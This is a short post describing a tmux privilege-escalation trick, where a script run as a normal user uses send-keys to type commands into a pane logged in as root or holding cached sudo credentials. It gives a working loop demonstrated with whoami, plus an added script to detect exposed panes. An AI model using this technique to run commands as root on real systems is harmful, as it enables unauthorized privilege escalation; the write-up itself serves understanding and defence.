tmux privilege escalation abusing send-keys
A script run as user in tmux can under some circumstances execute commands as root.
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.
When I saw the send-keys feature, I was like:
"What if there's another pane, where the user is logged in as root?"
    tmux
    tmux sp
    su # login as root
Now go back to the other tmux pane (where you are logged in as user).
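Now run the following script to execute whoami in every pane:
    #!/bin/sh
    # Walk every pane of the current window (this pattern only matches single-digit pane indexes).
    for pane in `tmux list-panes | grep -Po '^\d'`; do
        # Interrupt whatever is running in the pane.
        tmux send-keys -t "$pane" 'C-c'
        # Type the command, then press Enter so it actually runs.
        tmux send-keys -t "$pane" 'whoami' Enter
    done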
You will see, as expected, the command whoami returned root.
With the same trick you can abuse the fact that sudo was used in another pane.
    tmux send-keys -t "$pane" 'sudo whoami' Enter
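Seen from the defender's side, the exposure is any pane whose tty hosts a process owned by a different user than the one running tmux. The check below is an added example, not part of the original post; the function names and the sample rows are assumptions, and it does not cover the sudo case, where no root process is left running in the pane.

```sh
#!/bin/sh
# Added example: find tmux panes that send-keys could drive as another user.

# Emit "pane_id user command" for every process attached to each pane's tty.
# Uses tmux's pane_id / pane_tty format variables and ps -t.
collect_pane_procs() {
    tmux list-panes -a -F '#{pane_id} #{pane_tty}' |
    while read -r pane tty; do
        ps -t "${tty#/dev/}" -o user= -o comm= |
        while read -r user comm; do
            printf '%s %s %s\n' "$pane" "$user" "$comm"
        done
    done
}

# Read those rows on stdin; print "pane_id user" once for each pane that
# hosts a process not owned by $1 (the user who owns the tmux server).
flag_foreign_panes() {
    awk -v owner="$1" '$2 != owner && !seen[$1 FS $2]++ { print $1, $2 }'
}

# Constructed sample rows: pane %1 is where "su" was run.
sample_rows() {
    cat <<'EOF'
%0 alice sh
%1 alice sh
%1 root su
%1 root sh
EOF
}

# Live check inside a tmux session; otherwise show the constructed sample.
if [ -n "${TMUX:-}" ]; then
    collect_pane_procs | flag_foreign_panes "$(id -un)"
else
    sample_rows | flag_foreign_panes alice
fi
```

Any pane it prints should be closed or moved to a separate tmux server before running untrusted scripts in the same session.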